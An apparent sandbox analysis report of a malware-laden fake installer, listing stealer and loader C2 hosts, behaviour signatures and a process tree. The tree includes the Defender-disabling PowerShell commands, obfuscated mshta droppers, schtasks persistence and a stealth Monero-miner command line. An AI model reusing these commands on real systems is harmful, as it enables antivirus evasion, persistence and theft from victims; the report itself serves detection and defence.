Resubmissions

01-11-2021 20:09

211101-yw5kbaafg5 10

01-11-2021 07:13

211101-h2lrdsdhhj 10

01-11-2021 06:40

211101-hfpk6adhfj 10

31-10-2021 18:27

211031-w3r7fsdafj 10

31-10-2021 14:10

211031-rgstmscghm 10

31-10-2021 08:02

211031-jxchlacefm 10

31-10-2021 06:36

211031-hczxqacddp 10

31-10-2021 06:23

211031-g5wv4affb3 10

Analysis

  • max time kernel
    1027s
  • max time network
    10749s
  • platform
    windows10_x64
  • resource
    win10-en-20211014
  • submitted
    01-11-2021 06:40

General

  • Target

    setup_x86_x64_install.exe

  • Size

    4.5MB

  • MD5

    3da25ccfa9c258e3ae26854391531c7b

  • SHA1

    1ed5613b0ad8ab4c47f07e52199a4edd27be40e6

  • SHA256

    62be0ca52ea9ebc4c577d597b919f6b90cebdcc2179d7d482a04bf5731eec720

  • SHA512

    defed576df3d8325259884b485a0dc7cd673c47028e77f189255e27dca312a0befdc8dc84106cc3103a3027e67a835fad899f9361076a64831db144354a4618c

Malware Config

Extracted

Family

redline

Botnet

srtupdate33

C2

135.181.129.119:4805

Extracted

Family

smokeloader

Version

2020

C2

http://brandyjaggers.com/upload/

http://andbal.com/upload/

http://alotofquotes.com/upload/

http://szpnc.cn/upload/

http://uggeboots.com/upload/

http://100klv.com/upload/

http://rapmusic.at/upload/

rc4.i32
rc4.i32

Extracted

Family

vidar

Version

41.6

Botnet

933

C2

https://mas.to/@lilocc

Attributes
  • profile_id

    933

Signatures

  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 2 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE ClipBanker Variant Activity (POST)

    suricata: ET MALWARE ClipBanker Variant Activity (POST)

  • suricata: ET MALWARE GCleaner Downloader Activity M5

    suricata: ET MALWARE GCleaner Downloader Activity M5

  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

    suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)

  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

    suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 2 IoCs
  • ASPack v2.12-2.42 7 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Downloads MZ/PE file
  • Executes dropped EXE 64 IoCs
  • Checks BIOS information in registry 2 TTPs 10 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 3 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 5 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 5 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 9 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 14 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 7 IoCs
  • Modifies data under HKEY_USERS 16 IoCs
  • Modifies registry class 23 IoCs
  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s BITS
    1⤵
    • Suspicious use of SetThreadContext
    • Modifies registry class
    PID:592
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k SystemNetworkService
      2⤵
      • Drops file in System32 directory
      • Checks processor information in registry
      • Modifies data under HKEY_USERS
      • Modifies registry class
      PID:5124
  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Browser
    1⤵
      PID:2952
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
        PID:2620
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
        1⤵
          PID:2608
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
          1⤵
            PID:2480
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
            1⤵
              PID:2452
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
              1⤵
                PID:1852
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                1⤵
                  PID:1356
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s SENS
                  1⤵
                    PID:1300
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Themes
                    1⤵
                      PID:1156
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                      1⤵
                      • Modifies registry class
                      PID:1112
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                      1⤵
                      • Drops file in System32 directory
                      PID:1036
                      • C:\Users\Admin\AppData\Roaming\tjahbei
                        C:\Users\Admin\AppData\Roaming\tjahbei
                        2⤵
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:1020
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                      1⤵
                        PID:1008
                      • C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
                        "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
                        1⤵
                        • Suspicious use of WriteProcessMemory
                        PID:3388
                        • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                          "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                          2⤵
                          • Executes dropped EXE
                          • Suspicious use of WriteProcessMemory
                          PID:3680
                          • C:\Users\Admin\AppData\Local\Temp\7zS06E79316\setup_install.exe
                            "C:\Users\Admin\AppData\Local\Temp\7zS06E79316\setup_install.exe"
                            3⤵
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Suspicious use of WriteProcessMemory
                            PID:1136
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
                              4⤵
                              • Suspicious use of WriteProcessMemory
                              PID:3944
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
                                5⤵
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:1480
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                              4⤵
                              • Suspicious use of WriteProcessMemory
                              PID:1496
                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                                5⤵
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2844
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c Sun03d477f1a31.exe
                              4⤵
                              • Suspicious use of WriteProcessMemory
                              PID:3776
                              • C:\Users\Admin\AppData\Local\Temp\7zS06E79316\Sun03d477f1a31.exe
                                Sun03d477f1a31.exe
                                5⤵
                                • Executes dropped EXE
                                • Suspicious use of AdjustPrivilegeToken
                                PID:364
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd.exe /c taskkill /f /im chrome.exe
                                  6⤵
                                    PID:4208
                                    • C:\Windows\SysWOW64\taskkill.exe
                                      taskkill /f /im chrome.exe
                                      7⤵
                                      • Kills process with taskkill
                                      PID:2320
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c Sun03e4aeb7e43a1c.exe
                                4⤵
                                • Suspicious use of WriteProcessMemory
                                PID:1972
                                • C:\Users\Admin\AppData\Local\Temp\7zS06E79316\Sun03e4aeb7e43a1c.exe
                                  Sun03e4aeb7e43a1c.exe
                                  5⤵
                                  • Executes dropped EXE
                                  PID:3092
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\4458024477.exe"
                                    6⤵
                                      PID:4276
                                      • C:\Users\Admin\AppData\Local\Temp\4458024477.exe
                                        "C:\Users\Admin\AppData\Local\Temp\4458024477.exe"
                                        7⤵
                                        • Executes dropped EXE
                                        • Suspicious use of SetThreadContext
                                        PID:4296
                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                          #cmd
                                          8⤵
                                          • Checks processor information in registry
                                          PID:5236
                                          • C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
                                            "C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe"
                                            9⤵
                                            • Executes dropped EXE
                                            PID:3156
                                          • C:\Users\Admin\AppData\Roaming\League1.exe
                                            "C:\Users\Admin\AppData\Roaming\League1.exe"
                                            9⤵
                                            • Executes dropped EXE
                                            PID:4704
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\4985643500.exe"
                                      6⤵
                                        PID:2168
                                        • C:\Users\Admin\AppData\Local\Temp\4985643500.exe
                                          "C:\Users\Admin\AppData\Local\Temp\4985643500.exe"
                                          7⤵
                                          • Executes dropped EXE
                                          PID:3996
                                      • C:\Windows\SysWOW64\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /c taskkill /im "Sun03e4aeb7e43a1c.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS06E79316\Sun03e4aeb7e43a1c.exe" & exit
                                        6⤵
                                          PID:1044
                                          • C:\Windows\SysWOW64\taskkill.exe
                                            taskkill /im "Sun03e4aeb7e43a1c.exe" /f
                                            7⤵
                                            • Kills process with taskkill
                                            PID:5808
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /c Sun038aa349e3318e.exe
                                      4⤵
                                        PID:1940
                                        • C:\Users\Admin\AppData\Local\Temp\7zS06E79316\Sun038aa349e3318e.exe
                                          Sun038aa349e3318e.exe
                                          5⤵
                                          • Executes dropped EXE
                                          PID:1648
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /c Sun0351a0558292.exe
                                        4⤵
                                          PID:3784
                                          • C:\Users\Admin\AppData\Local\Temp\7zS06E79316\Sun0351a0558292.exe
                                            Sun0351a0558292.exe
                                            5⤵
                                            • Executes dropped EXE
                                            PID:892
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /c Sun038db98f99bf9a.exe
                                          4⤵
                                            PID:3804
                                            • C:\Users\Admin\AppData\Local\Temp\7zS06E79316\Sun038db98f99bf9a.exe
                                              Sun038db98f99bf9a.exe
                                              5⤵
                                              • Executes dropped EXE
                                              PID:1256
                                          • C:\Windows\SysWOW64\cmd.exe
                                            C:\Windows\system32\cmd.exe /c Sun0324aba28588c0.exe
                                            4⤵
                                              PID:1976
                                              • C:\Users\Admin\AppData\Local\Temp\7zS06E79316\Sun0324aba28588c0.exe
                                                Sun0324aba28588c0.exe
                                                5⤵
                                                • Executes dropped EXE
                                                • Checks SCSI registry key(s)
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious behavior: MapViewOfSection
                                                PID:2192
                                            • C:\Windows\SysWOW64\cmd.exe
                                              C:\Windows\system32\cmd.exe /c Sun0397381f1f458e.exe
                                              4⤵
                                                PID:1872
                                                • C:\Users\Admin\AppData\Local\Temp\7zS06E79316\Sun0397381f1f458e.exe
                                                  Sun0397381f1f458e.exe
                                                  5⤵
                                                  • Executes dropped EXE
                                                  PID:1484
                                                  • C:\Users\Admin\AppData\Local\Temp\7zS06E79316\Sun0397381f1f458e.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\7zS06E79316\Sun0397381f1f458e.exe" -u
                                                    6⤵
                                                    • Executes dropped EXE
                                                    PID:1916
                                              • C:\Windows\SysWOW64\cmd.exe
                                                C:\Windows\system32\cmd.exe /c Sun03f0dc4460bc9.exe
                                                4⤵
                                                • Suspicious use of WriteProcessMemory
                                                PID:864
                                              • C:\Windows\SysWOW64\cmd.exe
                                                C:\Windows\system32\cmd.exe /c Sun039750b00c.exe
                                                4⤵
                                                • Suspicious use of WriteProcessMemory
                                                PID:372
                                                • C:\Users\Admin\AppData\Local\Temp\7zS06E79316\Sun039750b00c.exe
                                                  Sun039750b00c.exe
                                                  5⤵
                                                  • Executes dropped EXE
                                                  PID:888
                                                  • C:\Windows\SysWOW64\mshta.exe
                                                    "C:\Windows\System32\mshta.exe" vbsCRipt: CLoSE( createOBJeCT ( "wsCript.ShelL"). rUn ( "cMD.exE /R tyPe ""C:\Users\Admin\AppData\Local\Temp\7zS06E79316\Sun039750b00c.exe"" > wXE1XgqZIR_W9IM.exE && start WXE1XgqzIr_w9IM.eXe -PRt0qXDI7zI & if """" == """" for %m in ( ""C:\Users\Admin\AppData\Local\Temp\7zS06E79316\Sun039750b00c.exe"" ) do taskkill -Im ""%~Nxm"" /F " , 0 , TrUe ) )
                                                    6⤵
                                                      PID:2972
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" /R tyPe "C:\Users\Admin\AppData\Local\Temp\7zS06E79316\Sun039750b00c.exe" > wXE1XgqZIR_W9IM.exE && start WXE1XgqzIr_w9IM.eXe -PRt0qXDI7zI & if "" == "" for %m in ( "C:\Users\Admin\AppData\Local\Temp\7zS06E79316\Sun039750b00c.exe" ) do taskkill -Im "%~Nxm" /F
                                                        7⤵
                                                          PID:1164
                                                          • C:\Users\Admin\AppData\Local\Temp\wXE1XgqZIR_W9IM.exE
                                                            WXE1XgqzIr_w9IM.eXe -PRt0qXDI7zI
                                                            8⤵
                                                            • Executes dropped EXE
                                                            PID:3972
                                                            • C:\Windows\SysWOW64\mshta.exe
                                                              "C:\Windows\System32\mshta.exe" vbsCRipt: CLoSE( createOBJeCT ( "wsCript.ShelL"). rUn ( "cMD.exE /R tyPe ""C:\Users\Admin\AppData\Local\Temp\wXE1XgqZIR_W9IM.exE"" > wXE1XgqZIR_W9IM.exE && start WXE1XgqzIr_w9IM.eXe -PRt0qXDI7zI & if ""-PRt0qXDI7zI "" == """" for %m in ( ""C:\Users\Admin\AppData\Local\Temp\wXE1XgqZIR_W9IM.exE"" ) do taskkill -Im ""%~Nxm"" /F " , 0 , TrUe ) )
                                                              9⤵
                                                                PID:4320
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /R tyPe "C:\Users\Admin\AppData\Local\Temp\wXE1XgqZIR_W9IM.exE" > wXE1XgqZIR_W9IM.exE && start WXE1XgqzIr_w9IM.eXe -PRt0qXDI7zI & if "-PRt0qXDI7zI " == "" for %m in ( "C:\Users\Admin\AppData\Local\Temp\wXE1XgqZIR_W9IM.exE" ) do taskkill -Im "%~Nxm" /F
                                                                  10⤵
                                                                    PID:4624
                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                  "C:\Windows\System32\mshta.exe" VBSCripT: CLOse ( CReAteoBjECt ( "wScrIPT.SHeLL" ). RuN ( "CmD /C EcHo | sEt /P = ""MZ"" > QKYLkI3.T & CopY /Y /b QKYLkI3.T +KXCn0WxW.e+ 8QfI1D5v.X + 52TbWL.SZV + Y4JTKX.X9 +88N4.I + xU3XyT.P UKHPFGIw.UMV & START msiexec.exe -Y .\UKHPfGIw.UMV " , 0 , TRUe ))
                                                                  9⤵
                                                                    PID:948
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      "C:\Windows\System32\cmd.exe" /C EcHo | sEt /P = "MZ" > QKYLkI3.T & CopY /Y /b QKYLkI3.T +KXCn0WxW.e+ 8QfI1D5v.X + 52TbWL.SZV +Y4JTKX.X9 +88N4.I + xU3XyT.P UKHPFGIw.UMV & START msiexec.exe -Y .\UKHPfGIw.UMV
                                                                      10⤵
                                                                        PID:4168
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          C:\Windows\system32\cmd.exe /S /D /c" EcHo "
                                                                          11⤵
                                                                            PID:5192
                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /S /D /c" sEt /P = "MZ" 1>QKYLkI3.T"
                                                                            11⤵
                                                                              PID:5200
                                                                            • C:\Windows\SysWOW64\msiexec.exe
                                                                              msiexec.exe -Y .\UKHPfGIw.UMV
                                                                              11⤵
                                                                              • Loads dropped DLL
                                                                              PID:5180
                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                        taskkill -Im "Sun039750b00c.exe" /F
                                                                        8⤵
                                                                        • Kills process with taskkill
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:4240
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c Sun033e271e0ce96c08.exe /mixone
                                                                4⤵
                                                                • Suspicious use of WriteProcessMemory
                                                                PID:3848
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c Sun03ea09aa5c9686e5.exe
                                                                4⤵
                                                                  PID:672
                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS06E79316\Sun03ea09aa5c9686e5.exe
                                                                    Sun03ea09aa5c9686e5.exe
                                                                    5⤵
                                                                    • Executes dropped EXE
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:1996
                                                                    • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                      6⤵
                                                                      • Executes dropped EXE
                                                                      PID:3356
                                                                      • C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"
                                                                        7⤵
                                                                        • Executes dropped EXE
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:4472
                                                                        • C:\Users\Admin\AppData\Roaming\4417069.exe
                                                                          "C:\Users\Admin\AppData\Roaming\4417069.exe"
                                                                          8⤵
                                                                          • Executes dropped EXE
                                                                          PID:4864
                                                                        • C:\Users\Admin\AppData\Roaming\3202314.exe
                                                                          "C:\Users\Admin\AppData\Roaming\3202314.exe"
                                                                          8⤵
                                                                          • Executes dropped EXE
                                                                          • Checks BIOS information in registry
                                                                          • Checks whether UAC is enabled
                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                          PID:5340
                                                                        • C:\Users\Admin\AppData\Roaming\5211808.exe
                                                                          "C:\Users\Admin\AppData\Roaming\5211808.exe"
                                                                          8⤵
                                                                          • Executes dropped EXE
                                                                          • Checks BIOS information in registry
                                                                          • Checks whether UAC is enabled
                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                          PID:5552
                                                                        • C:\Users\Admin\AppData\Roaming\2487065.exe
                                                                          "C:\Users\Admin\AppData\Roaming\2487065.exe"
                                                                          8⤵
                                                                          • Executes dropped EXE
                                                                          PID:5628
                                                                          • C:\Windows\SysWOW64\mshta.exe
                                                                            "C:\Windows\System32\mshta.exe" VBScRIPt: cLoSE ( cReateoBJECT ( "WSCRiPT.SHelL" ). RuN ("C:\Windows\system32\cmd.exe /R copY /Y ""C:\Users\Admin\AppData\Roaming\2487065.exe"" ..\ozR8x.ExE &&STArt ..\ozR8X.Exe /PrWIGG7qbcjwuF1awT~BmZfq & If """" == """" for %T IN ( ""C:\Users\Admin\AppData\Roaming\2487065.exe"" ) do taskkill -iM ""%~nxT"" -f" , 0, trUe ) )
                                                                            9⤵
                                                                              PID:6132
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                "C:\Windows\system32\cmd.exe" /R copY /Y "C:\Users\Admin\AppData\Roaming\2487065.exe" ..\ozR8x.ExE &&STArt ..\ozR8X.Exe /PrWIGG7qbcjwuF1awT~BmZfq & If "" =="" for %T IN ( "C:\Users\Admin\AppData\Roaming\2487065.exe" ) do taskkill -iM "%~nxT" -f
                                                                                10⤵
                                                                                  PID:5856
                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                    taskkill -iM "2487065.exe" -f
                                                                                    11⤵
                                                                                    • Kills process with taskkill
                                                                                    PID:4944
                                                                            • C:\Users\Admin\AppData\Roaming\4398853.exe
                                                                              "C:\Users\Admin\AppData\Roaming\4398853.exe"
                                                                              8⤵
                                                                              • Executes dropped EXE
                                                                              PID:5692
                                                                            • C:\Users\Admin\AppData\Roaming\5683038.exe
                                                                              "C:\Users\Admin\AppData\Roaming\5683038.exe"
                                                                              8⤵
                                                                              • Executes dropped EXE
                                                                              • Adds Run key to start application
                                                                              PID:5668
                                                                              • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                                "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                                9⤵
                                                                                • Executes dropped EXE
                                                                                PID:4424
                                                                          • C:\Users\Admin\AppData\Local\Temp\Chrome5.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"
                                                                            7⤵
                                                                            • Executes dropped EXE
                                                                            PID:4304
                                                                            • C:\Windows\System32\conhost.exe
                                                                              "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"
                                                                              8⤵
                                                                                PID:4120
                                                                                • C:\Windows\System32\cmd.exe
                                                                                  "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                  9⤵
                                                                                    PID:204
                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                      schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                      10⤵
                                                                                      • Creates scheduled task(s)
                                                                                      PID:5776
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                    9⤵
                                                                                      PID:4812
                                                                                      • C:\Users\Admin\AppData\Roaming\services64.exe
                                                                                        C:\Users\Admin\AppData\Roaming\services64.exe
                                                                                        10⤵
                                                                                          PID:4688
                                                                                          • C:\Windows\System32\conhost.exe
                                                                                            "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                            11⤵
                                                                                            • Suspicious use of SetThreadContext
                                                                                            PID:4916
                                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                              "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                              12⤵
                                                                                                PID:5520
                                                                                                • C:\Windows\System32\conhost.exe
                                                                                                  "C:\Windows\System32\conhost.exe" "/sihost64"
                                                                                                  13⤵
                                                                                                    PID:5292
                                                                                                • C:\Windows\explorer.exe
                                                                                                  C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.udda/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6OAdluV/h8Wx+uVST9CwRTBBZDSizq+6yEkb73lzV2SG" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth
                                                                                                  12⤵
                                                                                                    PID:5676
                                                                                        • C:\Users\Admin\AppData\Local\Temp\inst1.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\inst1.exe"
                                                                                          7⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:4580
                                                                                        • C:\Users\Admin\AppData\Local\Temp\4.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\4.exe"
                                                                                          7⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:4796
                                                                                          • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                            8⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:5456
                                                                                        • C:\Users\Admin\AppData\Local\Temp\5.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\5.exe"
                                                                                          7⤵
                                                                                          • Executes dropped EXE
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:4960
                                                                                        • C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"
                                                                                          7⤵
                                                                                            PID:4104
                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                              "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                                                                              8⤵
                                                                                                PID:4716
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"
                                                                                                  9⤵
                                                                                                    PID:4412
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe
                                                                                                      ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi
                                                                                                      10⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:4628
                                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                                        "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                                                                                        11⤵
                                                                                                          PID:5348
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
